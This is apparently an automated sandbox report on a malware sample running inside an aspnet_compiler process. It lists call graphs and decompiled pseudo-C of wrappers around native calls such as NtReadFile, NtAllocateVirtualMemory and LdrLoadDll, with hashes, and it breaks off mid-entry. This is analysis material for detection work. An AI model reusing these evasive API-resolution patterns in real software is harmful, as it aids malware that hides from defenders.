25141->25142 25143 419393 25142->25143 25255 41a020 25142->25255 25143->25076 25145 4193b4 25258 413060 25145->25258 25147 419400 25147->25076 25148 4193d7 25148->25147 25149 413060 3 API calls 25148->25149 25151 4193f9 25149->25151 25151->25147 25283 414390 25151->25283 25152 41948a 25153 41949a 25152->25153 25377 419180 LdrLoadDll 25152->25377 25293 418ff0 25153->25293 25156 4194c8 25372 418140 25156->25372 25160 41819c 25159->25160 25161 4191e0 LdrLoadDll 25159->25161 25404 18c967a 25160->25404 25161->25160 25162 4181b7 25164 41a0a0 25162->25164 25165 4195d9 25164->25165 25407 4188f0 25164->25407 25165->25043 25168 413b44 25167->25168 25169 4191e0 LdrLoadDll 25167->25169 25168->25107 25168->25108 25168->25112 25169->25168 25171 4191e0 LdrLoadDll 25170->25171 25172 4185fc NtCreateFile 25171->25172 25172->25111 25174 41370c 25173->25174 25175 418560 LdrLoadDll 25174->25175 25176 41372d 25175->25176 25177 413734 25176->25177 25178 413748 25176->25178 25179 418710 2 API calls 25177->25179 25180 418710 2 API calls 25178->25180 25181 41373d 25179->25181 25182 413751 25180->25182 25181->25136 25237 41a2b0 LdrLoadDll RtlAllocateHeap 25182->25237 25184 41375c 25184->25136 25186 41345b 25185->25186 25187 41348e 25185->25187 25188 418560 LdrLoadDll 25186->25188 25189 4135d9 25187->25189 25193 4134aa 25187->25193 25191 413476 25188->25191 25190 418560 LdrLoadDll 25189->25190 25197 4135f4 25190->25197 25192 418710 2 API calls 25191->25192 25194 41347f 25192->25194 25195 418560 LdrLoadDll 25193->25195 25194->25138 25196 4134c5 25195->25196 25199 4134e1 25196->25199 25200 4134cc 25196->25200 25250 4185a0 LdrLoadDll 25197->25250 25203 4134e6 25199->25203 25204 4134fc 25199->25204 25202 418710 2 API calls 25200->25202 25201 41362e 25206 418710 2 API calls 25201->25206 25207 4134d5 25202->25207 25205 418710 2 API calls 25203->25205 25210 413501 25204->25210 25238 41a270 25204->25238 25208 4134ef 25205->25208 25209 413639 25206->25209 25207->25138 25208->25138 25209->25138 25214 413513 25210->25214 25241 418690 25210->25241 25213 413567 25215 41357e 25213->25215 25249 418520 LdrLoadDll 25213->25249 25214->25138 25217 413585 25215->25217 25218 41359a 25215->25218 25219 418710 2 API calls 25217->25219 25220 418710 2 API calls 25218->25220 25219->25214 25221 4135a3 25220->25221 25222 4135cf 25221->25222 25244 419e70 25221->25244 25222->25138 25224 4135ba 25225 41a0a0 2 API calls 25224->25225 25226 4135c3 25225->25226 25226->25138 25227->25112 25228->25133 25230 413d14 25229->25230 25231 4191e0 LdrLoadDll 25229->25231 25232 4185a0 LdrLoadDll 25230->25232 25231->25230 25232->25135 25234 41872c NtClose 25233->25234 25235 4191e0 LdrLoadDll 25233->25235 25234->25140 25235->25234 25236->25120 25237->25184 25240 41a288 25238->25240 25251 4188b0 25238->25251 25240->25210 25242 4186ac NtReadFile 25241->25242 25243 4191e0 LdrLoadDll 25241->25243 25242->25213 25243->25242 25245 419e94 25244->25245 25246 419e7d 25244->25246 25245->25224 25246->25245 25247 41a270 2 API calls 25246->25247 25248 419eab 25247->25248 25248->25224 25249->25215 25250->25201 25252 4191e0 LdrLoadDll 25251->25252 25253 4188cc RtlAllocateHeap 25252->25253 25254 4188df 25253->25254 25254->25240 25256 41a04d 25255->25256 25378 4187c0 25255->25378 25256->25145 25259 413071 25258->25259 25260 413079 25258->25260 25259->25148 25282 41334c 25260->25282 25381 41b250 25260->25381 25262 4130cd 25263 41b250 2 API calls 25262->25263 25264 4130d8 25263->25264 25265 413126 25264->25265 25386 41b2f0 25264->25386 25267 41b250 2 API calls 25265->25267 25268 41313a 25267->25268 25269 41b250 2 API calls 25268->25269 25271 4131ad 25269->25271 25270 41b250 2 API calls 25279 4131f5 25270->25279 25271->25270 25273 413324 25393 41b2b0 LdrLoadDll RtlFreeHeap 25273->25393 25275 41332e 25394 41b2b0 LdrLoadDll RtlFreeHeap 25275->25394 25277 413338 25395 41b2b0 LdrLoadDll RtlFreeHeap 25277->25395 25392 41b2b0 LdrLoadDll RtlFreeHeap 25279->25392 25280 413342 25396 41b2b0 LdrLoadDll RtlFreeHeap 25280->25396 25282->25148 25284 4143a1 25283->25284 25285 413a50 8 API calls 25284->25285 25286 4143b7 25285->25286 25287 4143f2 25286->25287 25288 414405 25286->25288 25292 41440a 25286->25292 25289 41a0a0 2 API calls 25287->25289 25290 41a0a0 2 API calls 25288->25290 25291 4143f7 25289->25291 25290->25292 25291->25152 25292->25152 25397 418eb0 25293->25397 25296 418eb0 LdrLoadDll 25297 41900d 25296->25297 25298 418eb0 LdrLoadDll 25297->25298 25299 419016 25298->25299 25300 418eb0 LdrLoadDll 25299->25300 25301 41901f 25300->25301 25302 418eb0 LdrLoadDll 25301->25302 25303 419028 25302->25303 25304 418eb0 LdrLoadDll 25303->25304 25305 419031 25304->25305 25306 418eb0 LdrLoadDll 25305->25306 25307 41903d 25306->25307 25308 418eb0 LdrLoadDll 25307->25308 25309 419046 25308->25309 25310 418eb0 LdrLoadDll 25309->25310 25311 41904f 25310->25311 25312 418eb0 LdrLoadDll 25311->25312 25313 419058 25312->25313 25314 418eb0 LdrLoadDll 25313->25314 25315 419061 25314->25315 25316 418eb0 LdrLoadDll 25315->25316 25317 41906a 25316->25317 25318 418eb0 LdrLoadDll 25317->25318 25319 419076 25318->25319 25320 418eb0 LdrLoadDll 25319->25320 25321 41907f 25320->25321 25322 418eb0 LdrLoadDll 25321->25322 25323 419088 25322->25323 25324 418eb0 LdrLoadDll 25323->25324 25325 419091 25324->25325 25326 418eb0 LdrLoadDll 25325->25326 25327 41909a 25326->25327 25328 418eb0 LdrLoadDll 25327->25328 25329 4190a3 25328->25329 25330 418eb0 LdrLoadDll 25329->25330 25331 4190af 25330->25331 25332 418eb0 LdrLoadDll 25331->25332 25333 4190b8 25332->25333 25334 418eb0 LdrLoadDll 25333->25334 25335 4190c1 25334->25335 25336 418eb0 LdrLoadDll 25335->25336 25337 4190ca 25336->25337 25338 418eb0 LdrLoadDll 25337->25338 25339 4190d3 25338->25339 25340 418eb0 LdrLoadDll 25339->25340 25341 4190dc 25340->25341 25342 418eb0 LdrLoadDll 25341->25342 25343 4190e8 25342->25343 25344 418eb0 LdrLoadDll 25343->25344 25345 4190f1 25344->25345 25346 418eb0 LdrLoadDll 25345->25346 25347 4190fa 25346->25347 25348 418eb0 LdrLoadDll 25347->25348 25349 419103 25348->25349 25350 418eb0 LdrLoadDll 25349->25350 25351 41910c 25350->25351 25352 418eb0 LdrLoadDll 25351->25352 25353 419115 25352->25353 25354 418eb0 LdrLoadDll 25353->25354 25355 419121 25354->25355 25356 418eb0 LdrLoadDll 25355->25356 25357 41912a 25356->25357 25358 418eb0 LdrLoadDll 25357->25358 25359 419133 25358->25359 25360 418eb0 LdrLoadDll 25359->25360 25361 41913c 25360->25361 25362 418eb0 LdrLoadDll 25361->25362 25363 419145 25362->25363 25364 418eb0 LdrLoadDll 25363->25364 25365 41914e 25364->25365 25366 418eb0 LdrLoadDll 25365->25366 25367 41915a 25366->25367 25368 418eb0 LdrLoadDll 25367->25368 25369 419163 25368->25369 25370 418eb0 LdrLoadDll 25369->25370 25371 41916c 25370->25371 25371->25156 25373 4191e0 LdrLoadDll 25372->25373 25374 41815c 25373->25374 25403 18c9860 LdrInitializeThunk 25374->25403 25375 418173 25375->25076 25377->25153 25379 4191e0 LdrLoadDll 25378->25379 25380 4187dc NtAllocateVirtualMemory 25379->25380 25380->25256 25382 41b260 25381->25382 25383 41b266 25381->25383 25382->25262 25384 41a270 2 API calls 25383->25384 25385 41b28c 25384->25385 25385->25262 25387 41b315 25386->25387 25389 41b34d 25386->25389 25388 41a270 2 API calls 25387->25388 25390 41b32a 25388->25390 25389->25264 25391 41a0a0 2 API calls 25390->25391 25391->25389 25392->25273 25393->25275 25394->25277 25395->25280 25396->25282 25398 418ecb 25397->25398 25399 413e50 LdrLoadDll 25398->25399 25400 418eeb 25399->25400 25401 413e50 LdrLoadDll 25400->25401 25402 418f97 25400->25402 25401->25402 25402->25296 25403->25375 25405 18c968f LdrInitializeThunk 25404->25405 25406 18c9681 25404->25406 25405->25162 25406->25162 25408 41890c RtlFreeHeap 25407->25408 25409 4191e0 LdrLoadDll 25407->25409 25408->25165 25409->25408 25411 406e30 25410->25411 25412 406e2b 25410->25412 25413 41a020 2 API calls 25411->25413 25412->25084 25419 406e55 25413->25419 25414 406eb8 25414->25084 25415 418140 2 API calls 25415->25419 25416 406ebe 25418 406ee4 25416->25418 25420 418840 2 API calls 25416->25420 25418->25084 25419->25414 25419->25415 25419->25416 25421 41a020 2 API calls 25419->25421 25426 418840 25419->25426 25422 406ed5 25420->25422 25421->25419 25422->25084 25424 418840 2 API calls 25423->25424 25425 4070fe 25424->25425 25425->25045 25427 4191e0 LdrLoadDll 25426->25427 25428 41885c 25427->25428 25431 18c96e0 LdrInitializeThunk 25428->25431 25429 418873 25429->25419 25431->25429 25433 419843 25432->25433 25436 409b40 25433->25436 25435 408a6a 25435->25051 25438 409b64 25436->25438 25437 409b6b 25437->25435 25438->25437 25439 409ba0 LdrLoadDll 25438->25439 25440 409bb7 25438->25440 25439->25440 25440->25435 25442 409eb3 25441->25442 25443 409f30 25442->25443 25457 417f10 LdrLoadDll 25442->25457 25443->25058 25446 4191e0 LdrLoadDll 25445->25446 25447 40cfab 25446->25447 25447->25061 25448 418a50 25447->25448 25449 418a56 25448->25449 25450 4191e0 LdrLoadDll 25449->25450 25451 418a6f LookupPrivilegeValueW 25450->25451 25451->25063 25453 4191e0 LdrLoadDll 25452->25453 25454 4184fc 25453->25454 25458 18c9910 LdrInitializeThunk 25454->25458 25455 41851b 25455->25064 25457->25443 25458->25455 25460 40a037 25459->25460 25461 409e90 LdrLoadDll 25460->25461 25462 40a066 25461->25462 25462->24988 25464 40d09a 25463->25464 25472 40d150 25463->25472 25465 409e90 LdrLoadDll 25464->25465 25466 40d0bc 25465->25466 25473 4181c0 25466->25473 25468 40d0fe 25476 418200 25468->25476 25471 418710 2 API calls 25471->25472 25472->24991 25472->24992 25474 4191e0 LdrLoadDll 25473->25474 25475 4181dc 25474->25475 25475->25468 25477 41821c 25476->25477 25478 4191e0 LdrLoadDll 25476->25478 25481 18c9fe0 LdrInitializeThunk 25477->25481 25478->25477 25479 40d144 25479->25471 25481->25479 25483 409ca1 25482->25483 25484 409c9d 25482->25484 25485 409cba 25483->25485 25486 409cec 25483->25486 25484->25002 25528 417f50 LdrLoadDll 25485->25528 25529 417f50 LdrLoadDll 25486->25529 25488 409cfd 25488->25002 25490 409cdc 25490->25002 25492 40d200 3 API calls 25491->25492 25493 4133c6 25491->25493 25492->25493 25493->25004 25530 407710 25494->25530 25497 407a0d 25497->25006 25498 407710 19 API calls 25499 4079fa 25498->25499 25499->25497 25548 40d470 10 API calls 25499->25548 25502 4191e0 LdrLoadDll 25501->25502 25503 41879c 25502->25503 25669 18c98f0 LdrInitializeThunk 25503->25669 25504 40a772 25506 40d200 25504->25506 25507 40d21d 25506->25507 25670 418240 25507->25670 25510 40d265 25510->25010 25511 418290 2 API calls 25512 40d28e 25511->25512 25512->25010 25514 4191e0 LdrLoadDll 25513->25514 25515 4182ac 25514->25515 25676 18c9780 LdrInitializeThunk 25515->25676 25516 40a7d5 25516->25016 25516->25019 25519 4191e0 LdrLoadDll 25518->25519 25520 4182fc 25519->25520 25677 18c97a0 LdrInitializeThunk 25520->25677 25521 40a8a9 25521->25027 25524 4191e0 LdrLoadDll 25523->25524 25525 4180bc 25524->25525 25678 18c9a20 LdrInitializeThunk 25525->25678 25526 40a8fc 25526->25031 25528->25490 25529->25488 25531 406e20 4 API calls 25530->25531 25546 40772a 25531->25546 25532 4079b9 25532->25497 25532->25498 25533 4079af 25534 4070e0 2 API calls 25533->25534 25534->25532 25537 418180 2 API calls 25537->25546 25539 418710 LdrLoadDll NtClose 25539->25546 25542 40a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 25542->25546 25545 4180a0 2 API calls 25545->25546 25546->25532 25546->25533 25546->25537 25546->25539 25546->25542 25546->25545 25549 417f90 25546->25549 25553 407540 25546->25553 25565 40d350 LdrLoadDll NtClose 25546->25565 25566 418010 LdrLoadDll 25546->25566 25567 418040 LdrLoadDll 25546->25567 25568 4180d0 LdrLoadDll 25546->25568 25569 407310 25546->25569 25585 405ea0 LdrLoadDll 25546->25585 25548->25497 25550 417f9c 25549->25550 25551 4191e0 LdrLoadDll 25550->25551 25552 417fac 25551->25552 25552->25546 25554 407556 25553->25554 25586 417b00 25554->25586 25556 40756f 25561 4076e1 25556->25561 25607 407120 25556->25607 25558 407655 25559 407310 11 API calls 25558->25559 25558->25561 25560 407683 25559->25560 25560->25561 25562 418180 2 API calls 25560->25562 25561->25546 25563 4076b8 25562->25563 25563->25561 25564 418780 2 API calls 25563->25564 25564->25561 25565->25546 25566->25546 25567->25546 25568->25546 25570 407339 25569->25570 25647 407280 25570->25647 25572 40734c 25574 418780 2 API calls 25572->25574 25575 4073d7 25572->25575 25577 4073d2 25572->25577 25655 40d3d0 25572->25655 25574->25572 25575->25546 25576 418710 2 API calls 25578 40740a 25576->25578 25577->25576 25578->25575 25579 417f90 LdrLoadDll 25578->25579 25580 40746f 25579->25580 25580->25575 25659 417fd0 25580->25659 25582 4074d3 25582->25575 25583 413a50 8 API calls 25582->25583 25584 407528 25583->25584 25584->25546 25585->25546 25587 41a270 2 API calls 25586->25587 25588 417b17 25587->25588 25614 408160 25588->25614 25590 417b32 25591 417b70 25590->25591 25592 417b59 25590->25592 25595 41a020 2 API calls 25591->25595 25593 41a0a0 2 API calls 25592->25593 25594 417b66 25593->25594 25594->25556 25596 417baa 25595->25596 25597 41a020 2 API calls 25596->25597 25598 417bc3 25597->25598 25604 417e64 25598->25604 25620 41a060 25598->25620 25601 417e50 25602 41a0a0 2 API calls 25601->25602 25603 417e5a 25602->25603 25603->25556 25605 41a0a0 2 API calls 25604->25605 25606 417eb9 25605->25606 25606->25556 25608 40721f 25607->25608 25609 407135 25607->25609 25608->25558 25609->25608 25610 413a50 8 API calls 25609->25610 25612 4071a2 25610->25612 25611 4071c9 25611->25558 25612->25611 25613 41a0a0 2 API calls 25612->25613 25613->25611 25615 408185 25614->25615 25616 409b40 LdrLoadDll 25615->25616 25617 4081b8 25616->25617 25619 4081dd 25617->25619 25623 40b340 25617->25623 25619->25590 25641 418800 25620->25641 25624 40b36c 25623->25624 25625 418460 LdrLoadDll 25624->25625 25626 40b385 25625->25626 25627 40b38c 25626->25627 25634 4184a0 25626->25634 25627->25619 25631 40b3c7 25632 418710 2 API calls 25631->25632 25633 40b3ea 25632->25633 25633->25619 25635 4191e0 LdrLoadDll 25634->25635 25636 4184bc 25635->25636 25640 18c9710 LdrInitializeThunk 25636->25640 25637 40b3af 25637->25627 25639 418a90 LdrLoadDll 25637->25639 25639->25631 25640->25637 25642 4191e0 LdrLoadDll 25641->25642 25643 41881c 25642->25643 25646 18c9a00 LdrInitializeThunk 25643->25646 25644 417e49 25644->25601 25644->25604 25646->25644 25648 407298 25647->25648 25649 409b40 LdrLoadDll 25648->25649 25650 4072b3 25649->25650 25651 413e50 LdrLoadDll 25650->25651 25652 4072c3 25651->25652 25653 4072cc PostThreadMessageW 25652->25653 25654 4072e0 25652->25654 25653->25654 25654->25572 25656 40d3e3 25655->25656 25662 418110 25656->25662 25660 417fec 25659->25660 25661 4191e0 LdrLoadDll 25659->25661 25660->25582 25661->25660 25663 418117 25662->25663 25664 4191e0 LdrLoadDll 25663->25664 25665 41812c 25664->25665 25668 18c9840 LdrInitializeThunk 25665->25668 25666 40d40e 25666->25572 25668->25666 25669->25504 25671 4191e0 LdrLoadDll 25670->25671 25672 41825c 25671->25672 25675 18c99a0 LdrInitializeThunk 25672->25675 25673 40d25e 25673->25510 25673->25511 25675->25673 25676->25516 25677->25521 25678->25526 25680 18c9540 LdrInitializeThunk

                                                  Executed Functions

                                                  Function 0041868A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 41868a-4186d9 call 4191e0 NtReadFile
                                                  C-Code - Quality: 23%
                                                  			E0041868A(intOrPtr _a12, char _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40, intOrPtr _a44, char _a48) {
				void* _t18;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_pop(ss);
				_t13 = _a12;
				_t31 = _a12 + 0xc48;
				E004191E0(_t29, _t13, _t31,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a48; // 0x413a31
				_t6 =  &_a40; // 0x413d72
				_t12 =  &_a16; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t31))( *_t12, _a20, _a24, _a28, _a32, _a36,  *_t6, _a44,  *_t4, _t30, _t33); // executed
				return _t18;
			}








                                                  0x0041868b
                                                  0x00418693
                                                  0x0041869f
                                                  0x004186a7
                                                  0x004186ac
                                                  0x004186b2
                                                  0x004186cd
                                                  0x004186d5
                                                  0x004186d9

                                                  APIs
                                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: 1:A$r=A$r=A
                                                  • API String ID: 2738559852-4243674446
                                                  • Opcode ID: 08ab42f6e56d3f7d4f470907905ab6e0fbc10069f9f5c731b9410892c3902fe5
                                                  • Instruction ID: 5570b4c242d5b933587f5774b9ef860265e6301005e9dfc31aacae5d88a44cb4
                                                  • Opcode Fuzzy Hash: 08ab42f6e56d3f7d4f470907905ab6e0fbc10069f9f5c731b9410892c3902fe5
                                                  • Instruction Fuzzy Hash: 60F0E2B6210108ABDB14DF89DC84EEB77A9AF8C754F118249FA1DA7241D630E951CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418690 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3 418690-4186a6 4 4186ac-4186d9 NtReadFile 3->4 5 4186a7 call 4191e0 3->5 5->4
                                                  C-Code - Quality: 37%
                                                  			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                  0x00418693
                                                  0x0041869f
                                                  0x004186a7
                                                  0x004186ac
                                                  0x004186b2
                                                  0x004186cd
                                                  0x004186d5
                                                  0x004186d9

                                                  APIs
                                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: 1:A$r=A$r=A
                                                  • API String ID: 2738559852-4243674446
                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409B40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 270 409b40-409b69 call 41af70 273 409b6b-409b6e 270->273 274 409b6f-409b7d call 41b390 270->274 277 409b8d-409b9e call 419720 274->277 278 409b7f-409b8a call 41b610 274->278 283 409ba0-409bb4 LdrLoadDll 277->283 284 409bb7-409bba 277->284 278->277 283->284
                                                  C-Code - Quality: 100%
                                                  			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                  0x00409b5c
                                                  0x00409b5f
                                                  0x00409b64
                                                  0x00409b69
                                                  0x00409b73
                                                  0x00409b78
                                                  0x00409b7b
                                                  0x00409b7d
                                                  0x00409b85
                                                  0x00409b8a
                                                  0x00409b8a
                                                  0x00409b91
                                                  0x00409b99
                                                  0x00409b9c
                                                  0x00409b9e
                                                  0x00409bb2
                                                  0x00000000
                                                  0x00409bb4
                                                  0x00409bba
                                                  0x00409b6e
                                                  0x00409b6e
                                                  0x00409b6e

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                  • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                  • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004185E0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 285 4185e0-418631 call 4191e0 NtCreateFile
                                                  C-Code - Quality: 100%
                                                  			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                  0x004185ef
                                                  0x004185f7
                                                  0x0041862d
                                                  0x00418631

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004187C0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 288 4187c0-4187fd call 4191e0 NtAllocateVirtualMemory
                                                  C-Code - Quality: 100%
                                                  			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                  0x004187cf
                                                  0x004187d7
                                                  0x004187f9
                                                  0x004187fd

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041870A Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041870A(signed int __ecx, void* __edi, intOrPtr _a4, void* _a8) {
				long _t10;

				 *(__edi - 0x74aa7be6) =  *(__edi - 0x74aa7be6) & (__ecx | __ecx);
				_t7 = _a4;
				_t4 = _t7 + 0x10; // 0x300
				_t5 = _t7 + 0xc50; // 0x409763
				E004191E0(__edi, _a4, _t5,  *_t4, 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}




                                                  0x0041870c
                                                  0x00418713
                                                  0x00418716
                                                  0x0041871f
                                                  0x00418727
                                                  0x00418735
                                                  0x00418739

                                                  APIs
                                                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 0e53f2bfb2da4aa5421a0ae81bf0e7b6dc895be903cf2f6e0a4f3ecda0965472
                                                  • Instruction ID: 3498879bc617d96e5c4bfa9e44d2f589785647c92d181f3dfea50e010e11b73f
                                                  • Opcode Fuzzy Hash: 0e53f2bfb2da4aa5421a0ae81bf0e7b6dc895be903cf2f6e0a4f3ecda0965472
                                                  • Instruction Fuzzy Hash: 2FE08C763082107BE711DBA48C59ED77B28EF44250F1444A9F94C9B242C630E600C7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418710 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
